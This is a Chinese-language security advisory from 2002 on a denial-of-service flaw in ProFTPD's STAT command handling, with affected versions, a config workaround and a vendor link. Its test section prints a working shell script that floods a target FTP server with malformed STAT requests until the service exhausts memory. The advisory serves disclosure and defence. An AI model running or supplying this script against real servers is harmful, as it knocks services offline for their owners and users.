ProFTPD STAT命令遠程拒絕服務的攻擊漏洞

發布日期：2002-12-09
更新日期：2002-12-16

受影響系統：

ProFTPD Project ProFTPD 1.2.7 rc3
ProFTPD Project ProFTPD 1.2.7 rc2
ProFTPD Project ProFTPD 1.2.7 rc1
ProFTPD Project ProFTPD 1.2.6
ProFTPD Project ProFTPD 1.2.5
ProFTPD Project ProFTPD 1.2.4
ProFTPD Project ProFTPD 1.2.3
ProFTPD Project ProFTPD 1.2.2
ProFTPD Project ProFTPD 1.2.1
    - Linux系統  
    - Unix系統

描述：

BUGTRAQ  ID: 6341

ProFTPD是一款開放原始碼FTP服務程式。

ProFTPD不正確處理畸形STAT命令，遠程攻擊者可以利用這個漏洞對FTP服務程式進行拒絕服務的攻擊，使其停止回應。

攻擊者如果向ProFTPD服務程式提交包含多個'/*'字元作為參數的STAT命令，會導致FTP服務崩潰，產生拒絕服務現象。

<*來源：b klein Gunnewiek （rmkleing@hio.hen.nl）
  
  連結：http://marc.theaimsgroup.com/?l=bugtraq&m=103963830009198&w=2
*>

測試方法：

警 告

以下程式(方法)可能帶有攻擊性，僅供安全研究與教學之用。使用者風險自負！
b klein Gunnewiek （rmkleing@hio.hen.nl）提供了如下測試方法：

#!/bin/sh
#
# proftpd <=1.2.7rc3 DoS - Requires anonymous/ftp login at least
# might work against many other FTP daemons
# consumes nearly all memory and alot of CPU
#
# tested against slackware 8.1 - proftpd 1.2.4 and 1.2.7rc3
#
# 7-dec-02 - detach  -  www.duho.org
#
# use: ./prodos.sh # do this some more to make sure the system eventually dies

cnt=25
while [ $cnt -gt 0 ] ; do
ftp -n << EOF&
o $1
quote user $2
quote pass $3
quote stat /*/*/*/*/*/*/*
quit
EOF
let cnt=cnt-1
done
sleep 2
killall -9 ftp
echo DONE!

#end

建議：

臨時解決方案：

如果您不能立刻安裝補丁或者升級，NSFOCUS建議您採取以下措施以降低威脅：

* 在'proftpd.conf'檔案中增加如下一行：

DenyFilter /*.*/

不過沒有得到證實。

廠商補丁：

ProFTPD Project
---------------
目前廠商還沒有提供補丁或者升級程式，我們建議使用此軟體的使用者隨時關注廠商的首頁以擷取最新版本：

http://www.proftpd.org/